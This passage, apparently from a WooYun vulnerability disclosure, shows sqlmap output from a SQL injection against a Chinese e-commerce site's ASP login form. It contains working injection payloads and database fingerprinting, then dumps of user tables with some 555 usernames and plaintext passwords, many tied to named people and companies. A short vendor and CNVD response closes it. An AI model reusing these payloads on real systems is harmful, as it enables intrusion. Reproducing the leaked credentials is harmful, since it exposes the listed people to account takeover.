    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (7783=7783) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113))&bookIn2=%E7%99%BB %E5%BD%95
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=-4230 UNION ALL SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) CHAR(118) CHAR(117) CHAR(88) CHAR(109) CHAR(81) CHAR(68) CHAR(66) CHAR(68) CHAR(100) CHAR(101) CHAR(84) CHAR(98) CHAR(103) CHAR(80) CHAR(75) CHAR(66) CHAR(65) CHAR(76) CHAR(80) CHAR(79) CHAR(72) CHAR(75) CHAR(89) CHAR(83) CHAR(107) CHAR(109) CHAR(105) CHAR(104) CHAR(84) CHAR(108) CHAR(72) CHAR(68) CHAR(82) CHAR(114) CHAR(99) CHAR(76) CHAR(84) CHAR(81) CHAR(100) CHAR(117) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113),NULL,NULL-- -&bookIn2=%E7%99%BB %E5%BD%95
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: chinaecnet
Table: userinfo
[4 columns]
+----------+------+
| Column   | Type |
+----------+------+
| address  | char |
| id       | int  |
| name     | char |
| password | char |
+----------+------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 7828=7828&bookIn2=%E7%99%BB %E5%BD%95
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 4141=CONVERT(INT,(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (4141=4141) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113)))&bookIn2=%E7%99%BB %E5%BD%95
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (7783=7783) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113))&bookIn2=%E7%99%BB %E5%BD%95
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=-4230 UNION ALL SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) CHAR(118) CHAR(117) CHAR(88) CHAR(109) CHAR(81) CHAR(68) CHAR(66) CHAR(68) CHAR(100) CHAR(101) CHAR(84) CHAR(98) CHAR(103) CHAR(80) CHAR(75) CHAR(66) CHAR(65) CHAR(76) CHAR(80) CHAR(79) CHAR(72) CHAR(75) CHAR(89) CHAR(83) CHAR(107) CHAR(109) CHAR(105) CHAR(104) CHAR(84) CHAR(108) CHAR(72) CHAR(68) CHAR(82) CHAR(114) CHAR(99) CHAR(76) CHAR(84) CHAR(81) CHAR(100) CHAR(117) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113),NULL,NULL-- -&bookIn2=%E7%99%BB %E5%BD%95
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: chinaecnet
Table: userinfo
[4 entries]
+----+------------+------------+
| id | name       | password   |
+----+------------+------------+
| 1  | viptest    | test       |
| 2  | test       | test       |
| 3  | HKECN      | hongk2001  |
| 4  | SZECN      | shenz2001  |
+----+------------+------------+


Database: chinaecnet
Table: usertable
[555 entries]
+-----------------+--------------+
| name            | password     |
+-----------------+--------------+
| 007             | 6661860      |
| 111             | 111          |
| 123             | 123          |
| 1234            | 1234         |
| 444444444444    | 444          |
| 749             | 749888       |
| 8206788         | 8206788      |
| 8884            | 4536         |
| 89533           | 89533        |
| 9898            | 9898         |
| aabb            | aabb         |
| abcd            | 7788         |
| AC POWER CORP.  | 24415921     |
| adam627         | wbh628       |
| adqliang        | 336403       |
| agencyoem       | 6968693      |
| alex-zhang      | 756839       |
| amazon          | 506628       |
| amos            | 730312       |
| amos73          | 730312       |
| ansse           | ansse        |
| ANSSEZHHOU      | ANSSE        |
| aoe0495         | 700116       |
| apricot         | zhigang      |
| as              | av           |
| asdf            | 741008       |
| asiancyber      | asiancyber   |
| aut             | 87321041     |
| b2btest         | b2btest      |
| b2btestlqf      | b2btestlqf   |
| banker08        | 961208       |
| bbell chung     | 760811       |
| bbgui           | bbliking     |
| beck            | 1104         |
| BEILIN          | 317496       |
| beiyue          | 88088        |
| ben             | 120          |
| bjbeilin        | ch1113       |
| bjgps           | 80485        |
| bjsales         | bjsales      |
| bjxwj           | xwj1218      |
| blzkgs          | pengtao      |
| bmw             | bmw          |
| bngong          | 700211       |
| bohai           | bohai        |
| btx             | 1234         |
| buaaczj         | 123456       |
| bwm             | puli         |
| bxhost          | bxhost123    |
| bxhost123       | bxhost123    |
| carrie9         | 404414       |
| CATHAY          | 225578       |
| cbit            | ls           |
| ccyu            | pzmiao123    |
| cdtm            | cdtm9988     |
| cent            | shcent       |
| cf2000          | cf2000       |
| chanda          | 197012       |
| chasten         | 1518         |
| chen            | 731027       |
| chengjg         | shuichuan    |
| chenjain        | chenjian     |
| chenjian        | chenjian     |
| chentie         | 7315         |
| chenwendong     | 740400       |
| chenwenyuan     | 970804       |
| chenwy          | 970804       |
| chenxin813      | 314159       |
| chiec           | chiec        |
| chinab2b        | runforest    |
| chinaysj        | config       |
| chongde wang    | 700813       |
| chs             | chschs       |
| cjb             | bjc          |
| cjb1212         | 681212       |
| cjb681212       | 681212       |
| cjj             | 965140       |
| cjj965140       | 965140       |
| CTHXY           | 22222        |
| cuifeng         | 7873801      |
| DDD             | 222          |
| Dee             | 12160817     |
| dengyong        | dy1          |
| dingjf          | arrow        |
| dlham           | bg2tah       |
| doer            | doer         |
| donghai         | 1220         |
| dongzi2000      | 6596239      |
| DTT             | 1019         |
| dushi           | 7872062      |
| dxy1            | wbclj        |
| dyksl           | 740413       |
| dyxp            | 512627       |
| ED              | hello        |
| ednamoon        | ednamoon     |
| et.et           | 58008419     |
| fan             | fan          |
| fareast         | xiaolai123   |
| fareast63       | xiaolai123   |
| fay             | yi.or        |
| fchh            | 827915       |
| ferfect         | xghaa        |
| fgm             | zwglw163zh   |
| FLY_WHY         | 076126       |
| fsdhc           | fsdhclw      |
| fuchuan         | flower30     |
| fy519           | hzyqcai      |
| Ge Deqi         | 770309       |
| gentle          | millex206    |
| gipsy           | 1            |
| GLW             | 19520630     |
| greatway        | gw44123      |
| gst             | lookman      |
| gsthkchina      | coco         |
| gychen          | 554108       |
| gzaut           | 87321041     |
| hailong         | *1973#       |
| hanmze          | 920035       |
| HAODE           | bcksa        |
| happyxiaoyue    | 770627       |
| harke           | hzhhzh       |
| harry           | 123123       |
| haventchen      | 95157051     |
| hawkmiao        | 70847084     |
| hectorlui       | hectorlui    |
| HEDAWEI         | MONEY        |
| hello           | loveyou      |
| henry           | gw44123      |
| hetong          | protel       |
| hezhichun       | 8246127      |
| HFWMX           | DZBSSYJS     |
| Hit             | 1976121      |
| hix             | 7862678      |
| hjjydx          | 123          |
| hjx             | 7862678      |
| hlqin           | hua6001      |
| htc             | 13586        |
| huang           | 1234         |
| Huang Xiao Yang | straight     |
| huanghb         | 12720333     |
| huangyaonb      | 20031        |
| huangyuefen     | 770627       |
| huifeng         | 730915       |
| hunter          | 6510         |
| huyongjun17     | 740315       |
| hwh             | 13586        |
| hyb             | 53612652     |
| hyg321          | hyg123       |
| hz              | 781129       |
| ic2000          | hjx          |
| icshop          | wszycj       |
| infogate        | 78920        |
| jackma          | 55555        |
| jackma5         | 55555        |
| jackyu          | 1973         |
| jane            | 1            |
| Javakuang       | 432301       |
| jct             | jctgxd       |
| jebour          | 111111       |
| jerry           | jerry        |
| jerry_yu        | jerry        |
| jiajia          | jiajia       |
| jiangwanli      | dongtinghu   |
| jim_zhang_2001  | 2808         |
| jingxy          | 111168       |
| jjm99           | youling      |
| jkliu2001       | 1            |
| jldq            | 19880808     |
| jmwwq           | 12345        |
| JOHN WANG       | 8334         |
| johnfeng        | 730904       |
| johnwoo         | 741128       |
| js              | JS           |
| jzq1206         | l4wAlMTY     |
| kehu01          | 042800       |
| kenny_lee       | 197072       |
| kent            | 0714         |
| kenweld         | 670225       |
| keqiang         | 362401       |
| keset           | lxcc         |
| langxiang       | gl6880       |
| ld007           | feiyang      |
| LDM             | 700210       |
| ldq             | 1997         |
| ldypipi         | 8062531      |
| ldypipi1999     | 8062531      |
| ledoem          | china        |
| lengyun         | 123456       |
| leo_liao        | diane        |
| Lewis Lu        | WbiA17       |
| lgc             | lgc2000      |
| lhln            | 862541       |
| lhw6608         | hwlhwl       |
| li              | 000          |
| LI HAO          | 862541       |
| li_kang         | 6968693      |
| li8h            | love88       |
| liil            | 9614         |
| lijian          | 221811       |
| likang          | 6968693      |
| lili            | 121          |
| liqian          | 570930       |
| litwh           | wt809        |
| liuchongyu      | 0929         |
| liugan          | windows      |
| LiuJun          | Liu!Jun      |
| liutong         | 5171282      |
| liuxiaoming     | 1            |
| liuxq           | bit54        |
| lixuehai        | llxxhh       |
| liyongfu        | 5899702      |
| lizhou hou      | faked        |
| lqf             | lqflqflqf    |
| lsd             | denying      |
| ltj             | 11111        |
| ltz             | 616918       |
| luihooyin       | lhy          |
| lumu            | 81961372     |
| lushi           | 930312       |
| luxiaoqiang     | 711116       |
| luxinduo        | 0717         |
| LWJ             | 000923       |
| lxiaoq          | bit54        |
| lxq968          | llxdqh       |
| lxwwhj          | 661011       |
| LY              | 7761         |
| lzh0148         | lzhlzh       |
| m98969          | 594198       |
| malei007        | 12345678     |
| mao xing biao   | 790930       |
| martin chen     | 1020         |
| maxwell         | q1o8o4       |
| mcc             | mcc          |
| meetingchina    | 126711       |
| meixiaoyan      | 770530m      |
| mengkaizh       | zh560407     |
| miser           | 111111       |
| mmmmm           | mmmmmm       |
| MOONGIRL        | MOONGIRL     |
| mozhao          | 29138        |
| mqz             | 631208       |
| mrsjy           | SINAsjy7624  |
| mrsjy30         | SINAsjy7624  |
| Nancy Huang     | 741130       |
| Nancy Huang1    | 741130       |
| narada          | 11111111     |
| ndy             | 00000        |
| netong          | protel       |
| nhgxzq          | 171831       |
| nianxing        | nx527910     |
| nihao           | 0428         |
| njtusc          | 939600       |
| njusc           | 939600       |
| nnd             | 111111       |
| nwjt            | wjtt928      |
| oe              | oe           |
| ofs             | ofs111       |
| opt             | syxzopt      |
| paite           | 11223344     |
| pengkung        | 420117       |
| pengtao         | pengtao      |
| pest            | drowssap     |
| pick            | 953458       |
| pjy             | pjy          |
| preset          | lxcc         |
| prince          | 88888888     |
| PTZJ            | 041605       |
| pzh             | hlzeng       |
| qian            | 7747         |
| qinf            | 5466         |
| qkqcp           | 123456       |
| qpqp            | qpqp         |
| qqqq            | 0000         |
| Ranger          | st0501       |
| RangerC         | st0501       |
| realwb          | rayto        |
| redtusk         | redtusk      |
| reset           | lxcc         |
| rilin           | ecghjk08     |
| rl88            | 126711       |
| robin           | 123          |
| rocwang         | 2234         |
| romain          | 856663       |
| sammi.lee       | 0000         |
| sandy           | sandy123     |
| sanping         | sanping      |
| sansitech       | fangang      |
| sdgfht          | 123          |
| SeaSky_Tiger    | 2102767      |
| shenbeilun      | loginlun     |
| shenou          | 8125         |
| shhec           | 3614         |
| shine           | sunshine     |
| shssxwjdqc      | 19761215     |
| skywards        | 362630       |
| smihtc          | smihtc       |
| SONGFANG        | 9001450      |
| srcbj           | q1o8o4       |
| stnwy           | 98718769     |
| stvvv           | 140442       |
| styan           | 197645       |
| suitian         | suitian69    |
| sunstrong       | mly`1963     |
| suyong          | suyong       |
| sxgwepc         | 123456       |
| syksl           | 740413       |
| szhtmy          | 3604131      |
| szhtmyic        | 3604131      |
| szlhd           | 930928       |
| talpov          | 142857       |
| TCZZY           | 7031156      |
| test            | test123      |
| test1           | test123      |
| thomas_sheng    | 007313       |
| tj001           | 471711       |
| tjlouzy         | 720315       |
| Tom             | 19810824     |
| tongweiyun      | 954321       |
| tony            | tony123      |
| tony99          | tony99       |
| Toprun          | Toprunx      |
| Treeman.L       | 84218421     |
| triloop         | 166811       |
| twy             | 500016       |
| twy1            | 500016       |
| tz1208          | 616918       |
| voyager         | yangvoy      |
| w1118           | 118439       |
| wang            | wang         |
| wang1           | 1            |
| wangllei        | 315931       |
| wanglw          | wtyx         |
| wave            | 85321        |
| WB              | 690520       |
| weidejiao       | 7711         |
| wenbin          | 901406       |
| wendy           | 12345        |
| WHJLXW          | 661011       |
| wiler wang      | 13178        |
| winghing-aw     | wh           |
| wingo           | 223344       |
| wj_zou          | zwj0206      |
| wjg             | 123          |
| wjmzh           | 197104       |
| wjmzh1          | 197104       |
| wjq             | 88888888     |
| wjz888          | 5400067      |
| wonser          | 118439       |
| wqx88           | 8074         |
| wsxnet          | w            |
| wuhai           | 12345        |
| wushixiang      | wu           |
| wusx            | www          |
| WUSX2000        | w            |
| wuwq            | 12345        |
| wuwu            | w            |
| wuxil           | nj8013cs     |
| wuxin           | symbol\\/    |
| ww              | 001969       |
| www1234         | 1234         |
| wxhx            | 5226022      |
| wyq             | 680517       |
| wyy727          | wyy123       |
| wzdk            | dk888        |
| xgyaguang       | xgqqq        |
| xia             | xia          |
| xiacait         | xiacait      |
| xiacait0828     | 19761215     |
| xiajianxi       | 750808       |
| xiay            | 753159Wc#4   |
| xidieke         | 123456       |
| xiechaoqun      | 929          |
| XIEXH           | 690311       |
| xj_wang         | wxj204       |
| xnda            | 880518       |
| xufen           | xufen        |
| xuyong          | 0419         |
| xxgang          | 756210       |
| xxt             | 123456       |
| xxxxxxxx        | xxxxxxxx     |
| XXZ             | guokeer      |
| xygwl           | 575883       |
| yaba            | 585858       |
| yaguang         | yaguang      |
| yan jianguo     | yjg          |
| YANG            | XYA123       |
| yang yinb       | yybyyb       |
| yang.ag         | 24415921     |
| yangguang       | 7873801      |
| yangjian        | 24396256     |
| yangxz          | 364062       |
| yanxiongwei     | duoduo       |
| yaozn           | 7873801      |
| yermen          | 62323        |
| yexi            | 939600       |
| yexii           | 939600       |
| yfc             | 2563         |
| yh              | yh           |
| ykkf            | ykkf         |
| ym.zhan         | 1008         |
| yu              | 1973         |
| yuan            | luxer        |
| yufn            | yu0927       |
| Yuguang Yang    | 860911       |
| yuzilong        | 1973         |
| ZABC            | 9812         |
| zgy             | 123456       |
| zhabin          | a0p1p6l4     |
| ZhangCheng      | wenrong1     |
| zhangjiaji      | 8817902      |
| zhangjiaji1     | 8817902      |
| zhangliang      | 345678       |
| zhangqihu       | andy         |
| zhangwei        | 691203       |
| zhangxu         | 921107       |
| zhaoqiuyun      | 1557p        |
| zhhm            | wsk59ga1     |
| zhiqiang        | 8416307      |
| zhou rong       | 1234         |
| zhouwen         | 770218       |
| zhuty           | zhuty        |
| zhxan           | 985569       |
| ZJJSJLDQ        | 19880801     |
| zjkl            | 8880017      |
| zlmzhong        | 741208       |
| ZM74            | 2174136      |
| zpzhk           | 750828       |
| zsh             | zsh3210      |
| zsmc            | king         |
| zsq             | 111222       |
| ZTOUCH          | 6A6A6A       |
| zzhhd           | zzhhd        |
| zzjj777         | 776150       |
| zzlight         | 8617056      |
| 柏俊              | 75219        |
| 宝丰ATI           | YYL68118     |
| 北京市恒威电子系统公司     | zrevek       |
| 北京英辰            | ycdz2000     |
| 北京中软            | RXIC         |
| 步步高电子产品无锡售后服务中心 | 212223       |
| 常戎              | 980922       |
| 陈建军             | 62475893     |
| 陈进杰             | 965140       |
| 陈先生             | friend       |
| 陈晓曙             | 941059       |
| 陈雪              | chen1114     |
| 电子              | okokok       |
| 董春              | 6413372      |
| 付昕军             | 7523         |
| 富历新             | 6413372      |
| 高全胜             | 1963824      |
| 高衍龙             | line         |
| 葛德奇             | 770309       |
| 顾军杰             | 961012       |
| 郭华玲             | 8383734      |
| 汉瞻公司            | hzyqcai      |
| 郝云鹏             | 888          |
| 恒通电脑            | 13586        |
| 胡春来             | 1234         |
| 胡开农             | pass         |
| 胡文              | 7301         |
| 花明渊             | 314159       |
| 华电网             | 12345        |
| 黄继忠             | 123456       |
| 黄晓春             | huang        |
| 京大电脑中心          | 661011       |
| 科瑞达             | 800323       |
| 邝亚凌             | kknd42       |
| 蓝鸥              | 82667550     |
| 廊坊市慧普电子有限公司     | 770925       |
| 李贵荣             | ei41         |
| 李洪亮             | 901554       |
| 李辉              | 1109         |
| 李加荣             | 6269550      |
| 李建堂             | 26774769     |
| 李靖              | 613076       |
| 李军              | 26774769     |
| 李康              | 6968693      |
| 李鹏77            | 761008       |
| 李鹏77216         | 761008       |
| 李文胜             | 123123       |
| 梁峰              | forliang45   |
| 林永生             | 92371        |
| 林永胜             | 92371        |
| 刘湘毅             | lxy          |
| 骆天天             | 123          |
| 马德荣             | 7809         |
| 马立新&科瑞达         | 800323       |
| 马留石             | 127871       |
| 马生              | 594198       |
| 孟祥宾             | 123456       |
| 孟祥宾8            | 123456       |
| 宁波中策电子有限公司      | okokok       |
| 普冠电子            | samli        |
| 奇麗新貿易有限公司       | 5238         |
| 钱飞龙             | 641227       |
| 全军              | 0326         |
| 全哲雄             | quanzx       |
| 阮章莹             | 359888       |
| 赛博电子            | 5617010      |
| 上海岛谷科技有限公司      | 7747         |
| 上能公司            | 123456       |
| 邵国振             | xfjdsgz      |
| 深圳市多和电子技术有限公司   | 396103       |
| 史慧杰             | 888999       |
| 舒海涛             | sht          |
| 宋财华             | ghf423       |
| 宋建才             | songjc       |
| 苏斌              | chinavision  |
| 苏洪端             | 730605       |
| 孙辉              | 681020       |
| 孙志强             | 8416307      |
| 汤家骏             | ustctjj      |
| 唐杰              | tangjie      |
| 唐正兴             | 8828549      |
| 天津磁卡            | aaaaaaaa     |
| 田松              | 5061339      |
| 铁矿              | 0520ch       |
| 王定军             | 2004         |
| 王海龙             | 123          |
| 王海龙123          | 123          |
| 王皓奎             | 1870209      |
| 王继刚             | 961122       |
| 王伟              | 888888       |
| 王新杰             | wxj204       |
| 王耀威             | &WxYlWj!     |
| 王垣平             | 63919        |
| 伟兴科电            | weixing      |
| 无锡华新电子有限公司      | 5226022      |
| 吴晓林             | lookup       |
| 西安三才电子有限公司      | 618          |
| 夏才通             | xiacaitong   |
| 小鱼              | 740126       |
| 邢向前             | 977320       |
| 徐贤伟             | 017713       |
| 许宁              | 6661860      |
| 延光              | 81000        |
| 杨波              | y1b8b6p2     |
| 杨林              | yl1369       |
| 姚美英             | 701223a      |
| 叶晖              | 123123       |
| 伊杨              | asdiad       |
| 由利人             | 1026         |
| 于立军             | 701223a      |
| 詹雨明             | 1008         |
| 张锋              | htxx001      |
| 张惠君             | 307648       |
| 张全              | 171831       |
| 正光公司            | 123          |
| 正华公司            | 28641        |
| 智力科学仪器厂         | 62712778     |
| 中策电子            | okokokwywywy |
| 周华              | 770101       |
| 周江滨             | 610830       |
| 祝英霞             | oio8lo9.     |
+-----------------+--------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-06 15:16

厂商回复:

CNVD确认所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无

漏洞评价:

评价